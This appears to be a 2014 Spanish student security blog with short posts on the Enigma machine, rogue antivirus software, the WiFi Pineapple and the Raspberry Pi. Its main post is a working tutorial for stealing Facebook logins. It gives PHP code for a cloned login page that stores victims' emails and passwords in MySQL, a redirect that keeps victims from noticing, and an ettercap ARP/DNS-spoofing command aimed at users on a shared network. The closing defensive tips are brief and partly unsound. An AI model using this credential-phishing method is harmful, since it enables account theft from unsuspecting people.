martes, 18 de noviembre de 2014

Máquina Enigma

Que es la maquina enigma ?

Era una máquina que se empezó a usar en Europa en los años 20´s, disponía de un mecanismo cifrado rotatorio, es decir, se utilizaba para cifrar y descifrar mensajes, fueron utilizadas por el ejército alemán durante la segunda guerra mundial, eran muy fáciles de manejar y se creían inviolables, el ejército alemán cambiaba cada día el código a usar, de tal forma que los aliados contaban con un único día para descifrarlo porque, al otro día, se volvía a cambiar, aunque después su cifrado fue descubierto y fue una de las causas por la que se considera que la segunda guerra mundial terminara más rápido.

 
Máquina enigma

En qué consistía la máquina Enigma? 

La máquina enigma era un dispositivo electromecánico, el mecanismo consistía en una serie de teclas, con las letras del alfabeto, al igual que una máquina de escribir, que en realidad eran interruptores que accionaban los dispositivos eléctricos y hacían mover unos cilindros rotatorios, el funcionamiento, cara al usuario, era bastante sencillo, el operador tenía que teclear las letras de su mensaje y anotar las letras que devolvía la máquina, el código a usar se fijaba con las posiciones de los cilindros que constaban, cada uno, de 26 cables que se conectaban al teclado pero, con la particularidad, que el primer cilindro giraba un veintiseisavo de vuelta después de cada pulsación, de tal manera que la posición de las conexiones iba cambiando con cada entrada del teclado, obteniendo un cifrado polialfabético.




Como se logro "romper" la maquina enigma?

En 1929 cuando los polacos interceptaron una máquina Enigma enviada de Berlín a Varsovia y equivocadamente no protegida, aunque no era un versión militar y pensaron que loa alemanes las podrían utilizar en el futuro, La codificación de un mensaje en Enigma obligaba a los operadores a introducir 3 letras, dos veces, al iniciar el mensaje, una especie de bandera. La Luftwaffe no modificaba esta secuencia y, por tanto, era un patrón que siempre se repetía y que fue aprovechado por Marian Rejewski que fue capaz de descifrar el código gracias a unas máquinas electromecánicas denominadas bombas criptológicas que eran unas máquinas Enigma de procesamiento en paralelo y que buscaban las codificaciones posibles.

En 1941 se capturo un submarino y pudieron extraer una maquina enigma con su libro de claves, gracias a todo esto se obtuvo como resultado el descifrado de los mensajes.

En lo general creo que para la época en que se construyo todo esto fue fascinante, ya que era un método muy avanzado y fue de mucho provecho para los alemanes durante mucho tiempo, gracias a estos nacieron los primeros computadores, que de echo fueron para descifrar códigos. 

lunes, 20 de octubre de 2014

ATAQUE DNS SPOOFING




COMO REALIZAR  UN SITIO (DE FACEBOOK) POR MEDIO DE UN ATAQUE DE HOMBRE EN MEDIO.

MATERIAL:
·         Computadora de escritorio o Laptop
·          Sistema operativo Kali Linux
·         Programa VMWare (este nos servirá para nuestra maquina atacante sea de forma virtual)
·         Generador de bases de datos (opcional)
·         Internet
El primer paso que haremos es entrar a símbolos de sistema para saber la “IP”  de nuestra máquina que utilizaremos de servidor web; una vez dentro de símbolos de sistema de Windows utilizaremos el siguiente comando para mostrarnos nuestra dirección IP.

Una vez tecleado el comando ip config daremos enter y tendrá que desplazarnos la dirección ip de nuestra máquina que utilizaremos como servidor de la página web.

Una vez esto capturaremos los datos (Ip’s) en un bloc de notas, esto  nos servirá para realizar el ataque en el sistema operativo Kali Linux; ya una vez obtenida nuestra ip lo que haremos será descargar la plantilla o página de Facebook.







Esto es para hacer el ataque a los usuarios conectados dentro de un host, ahora el siguiente paso es realizar una base de datos en la cual nosostros podamos guardar los datos que nos interesan, en este caso los datos que nos interesan es “e-mail y contraseña” , la base de datos se crea en el generador de bases de datos de tu preferencia, en este caso se utilizo mysql.
        Ya que se descargó la página hacemos uso de netbeans en el cual comenzara la inyección de código.
Descripción: https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvt5VHNzJiJZ4zP64irmcbEhOVOX6ixs5kJ2cCDgOFSvN7OiMWn8FHjh_afJ5v70I8W_xBE2lXc3sMfKeVCyobGgSuTr9TgrK4lfB_3KmcCHS3dS2KN6Id2jfBGPmNN3GIwVmo4CcEBsiT/s1600/1b.png



Vamos un nuevo proyecto y a nuestro primer archivo lo llamamos conexión, e utilizamos el siguiente codigo :
En este punto se manejan las conexiones que enlazaran nuestro sistema a un gestor de bases de datos en nuestro caso nuestro gestor es xampp
<?php
// conexion con MySQL clientes
        $dbhost="localhost";
        $dbuser="root";
        //dbpass="password";
        //el pasword se encuentra en blanco
        $dbname="cuenta_face";//nombre de la bd
        $tabla="registros";
        mysql_connect($dbhost, $dbuser); //se hace la conexion con mysql
        mysql_select_db($dbname); //se selecciona la bd
(Aquí se manejaras todas las conexiones, para enlazarnos con la base de datos (mysql).


En esta pagina falsa de facebook, vamos a utilizar el siguiente codigo, para tomar lo valores de los campos, correo electronico y contraseña para registrarlos en nuestra base de datos.
codigo
<form method="POST" action="http://localhost/PhpProject1/index.php" onsubmit="return window.Event &amp;&amp; Event.__inlineSubmit &amp;&amp; Event.__inlineSubmit(this,event)">
                <input type="hidden" name="lsd" value="AVqX0AAv" autocomplete="off">
                <?php
if(isset($_POST["Registrar"]))
    {
include("conexion.php");
    $user=$_POST["user"];
    $pass=$_POST["pass"];
    {
  Aquí se  insertan los datos de la víctima:
        $sql="INSERT INTO registros (user,pass)values('$user','$pass');";
}
if(!mysql_query($sql))
    echo "No se pudieron registrar los datos";
else 
     ?>
<br>

Esta es la pagina original de error de facebook que nos arrojara automaticamente despues de haber ingresado los datos, la pagina se redirecciona automaticamente para evitar cual tipo de sospecha.
Codigo para redericcionar:
<meta http-equiv="Refresh" content="1;url=https://www.facebook.com/login.php?login_attempt=1">
<?php
}
else
{
?>
<form name="registros" action="http://localhost/Phpproject1/index_falla.php" method="POST">







ATAQUE DNS SPOOFING

Ahora entraremos en una maquina virtual con el sistema operativo kali inux el cual sera la                         maquina atacante.                              
Dentro de nuestra maquina virtual atacante lo que haremos sera lo siguiente. Daremos doble click en el icono computer para buscar archivos del sistema de nuestro sistema.
Al abrir la ventana debe ser parecida a la siguiente:

Dentro de esta ventana prosegiremos a buscar nuestro archivo llamado etter.dns, para encontrar este archivo daremos clic sobre file System.
Dentro de esta carpeta buscaremos una sub carpeta llamada ‘usr’, una vez localizada daremos clic para abrirla.
Dentro de la carpeta “usr” buscaremos otra subcarpeta llamada ‘share’ y la abrimos dándole doble clic.

Una vez dentro de esta carpeta buscaremos una carpeta llamada ettercap ya que esta carpeta es la que contiene nuestro archivo que buscamos, la abrimos dándole clic.
Una vez dentro de la carpeta “ettercap” buscaremos  nuestro archivo llamado etter.dns, aquí abriremos nuestro archivo para modificarlo.
Dentro de este archivo lo que haremos es cambiar la dirección de ip al Facebook original, haciendo creer a la víctima que en realidad está introduciendo su usuario y contraseña en la página autentica,
Para eso nos dirigimos a la parte donde dice #suplantación de servidor DNS y escribimos la dirección de www.facebook.com o facebook.com  y tecleamos la ip de nuestra máquina que servirá de servidor, Una vez hecho esto solo cerramos la ventana.
Una vez cerrada nos dirigiremos a la terminal de Kali Linux donde teclearemos el siguiente comando
ettercap –T –q –M arp: remote –P dns_spoof //, y damos enter para ejecutarlo, este comando servirá para infectar nuestra red y robar el usuario y contraseña del usuario que ingrese a Facebook con la red infectada.
Solo esperamos a que termine el proceso de infección y llegue al 100%. Cuando este proceso llegue al 100% la red estará infectada y solo queda esperar que algún usuario entre a nuestra página falsa de Facebook.com o nosotros mismos podemos verificarlo estando dentro del mismo host.
En nuestro caso lo verificamos con una máquina virtual para saber si se estaba realizando la infección de la red correctamente, para esto solo tecleamos en la barra de dirección www.facebook.com o Facebook.com.
Como se ve en la imagen el ataque funciono correctamente ya que el usuario no sabe que está a punto de ser atacado ya que descargamos la plantilla web de Facebook y no tiene sospecha.
Para que el usuario no sospeche que ha sido robado su usuario y contraseña al momento de dar clic en iniciar sesión será redirigido a la página de Facebook original y así no se tendrá sospecha alguna de que se le ha robado su usuario y su contraseña de Facebook.
Aquí el usuario es redirigido a la página oficial y original de Facebook.

Como último solo nos queda entrar al local host de nuestra máquina que sirvió de servidor y entrar a nuestra base de datos creada para así mirar los usuarios afectados por este ataque.


¿Cómo podemos protegernos de estos ataques?
Podemos protegernos de estos ataques tecleando la ip de la página de Facebook, ya que la infección solo se hace si se teclea www.facebook.com y con la ip de Facebook no habría ningún problema
No entrar al sitio si en la dirección no está escrita http”S”; ejemplo. https://www.facebook.com, como se ve debe estar escrita la s en http ya que es un método de seguridad y estar seguro que es la página original.


miércoles, 1 de octubre de 2014

Qué es el Rouge Software?

El Rouge Software es un un programa informático malintencionado (falsos programas de seguridad), que no son lo que aparentan ser, si no mas bien todo lo contrario, nos lo venden como una solución para evitar "contagio" de cualquier tipo de virus.

Estos falsos antivirus, muestran un resultado de infección, cuando "escanea" nuestra computadora, pero en realidad no realiza ningún tipo de escaneo en nuestro computador y por lo mismo no eliminara ningún tipo de infección, 

En la imagen se muestra un ejemplo de como funcionan estos programas.

Ejemplo de resultado de escaneo.

Por que lo hacen?

Todos estos tipos de programa se hacen con un solo fin, que es vender la versión completa de sus programa, para escanear, limpiar eliminar todas las infecciones que se "encontraron", para obtener la mayor ganancia  económica posible.

Como saber si ya estamos infectados?

Por lo general nuestra PC empieza a alentarse, empiezan a salir ventanas emergentes de la nada. falsos mensajes de alertas, no se puede ejecutar nuestro antivirus, etc.

Como es que nos infectamos? 

Generalmente  cuando nos piden que necesitamos instalar algún plug-in al entrar a sitios pornográficos o al querer ver películas en linea, al visitar sitios fraudulentos, etc.

Como evitar ser infectados?
Mantener el sistema operativo actualizado, contar con un buen antivirus y por supuesto que este actualizado, siempre investigar antes de descargar algo en linea, 

Como eliminarlos?
Encontrar los archivos infectados y des infectarlos de forma manual, aunque es realmente difícil.


Algunos de los "falsos antivirus" son:

  1. #1 Spyware Killer
  2. 1 Click Spy Clean
  3. 100 Percent Anti-Spyware
  4. 1-2-3 Spyware Free
  5. 1stAntiVirus
  6. 2004 Adware/Spyware Remover & Blocker
  7. 2-AntiSpyware
  8. Antivirus Suite
  9. AVCare
  10. about:blank
  11. Active Security
  12. Ad Butcher
  13. AdArmor
  14. AdDriller
  15. AddwareRemover
  16. Addwere
  17. Ad-Eliminator
  18. AdEradicator
  19. AdFlusher
  20. Ad-Protect

Estos son algunos, ya que la lista puede llegar hacer hasta mas de 60.


miércoles, 17 de septiembre de 2014

¿Qué es pineapple wifi (piña wifi)?




Es un dispositivo para realizar ataques a paginas que hemos navegado, realizar ataques a redes WiFi, y esto permite espiar todo el trafico que hay en nuestra red en pocas palabras roba claves en Internet.

Con este aparato se atrae a los dispositivos que buscan conectarse a una WiFi.

Esta búsqueda se hace desde una lista que es ya es conocida por nuestra dispositivo, como nuestra red.

Entonces, la Piña WiFi lo que hace es simular ser cualquiera de esas redes de Internet que el dispositivo busca, suplantarla y entregarle el servicio de navegación, pero con la intención de capturarle la información.

Como tratar de defendernos de el?

  • Utilizar WPA/WPA2 para cifrar la información en la red.
  • Cambiar el nombre de la red del predeterminado.
  • Desactivar WiFi Protected Setup.
220px-raspberry-pi-beta-board.jpg
Foto: Raspberry Pi.

El Raspberry Pi es un mi-ni ordenador, que se conecta a un televisión convencional y a un teclado,  ya que cuenta con varios puertos y entradas, dos USD, uno de Ethernet y salida HDMI.
La placa contiene componentes como un ordenador tradicional, (procesador ARM a 700 Mhz,       procesador gráfico Video Core IV, y 512 de  memoria RAM, aunque no incluye disco duro, ya que utiliza una tarjeta SD para almacenar datos.
Puede ser utilizado para hacer hojas de calculo, procesador de texto y juegos, aunque también     reproduce vídeo de alta definición.
Aunque el proyecto fue ideado en el reino unido en el 2006, no fue hasta febrero del 2012 que fue lanzado al mercado, fue desarrollado por estudiantes de la universidad de Cambridge y fue creada  para fomentar el desarrollo de la computación en los niños.
Se comercializan dos modelos el A y B, el A es menos completo y su meoria RAM es de 256 MB, solo tiene un puerto usb, no tiene controlador Ethernet y es mas barato  y el modelo B es el mas recomendado por los expertos.

220px-raspberry-pi-board-at-transfersummit-2011-cropped.jpg
Foto: Placa Alpha de pruebas funcionando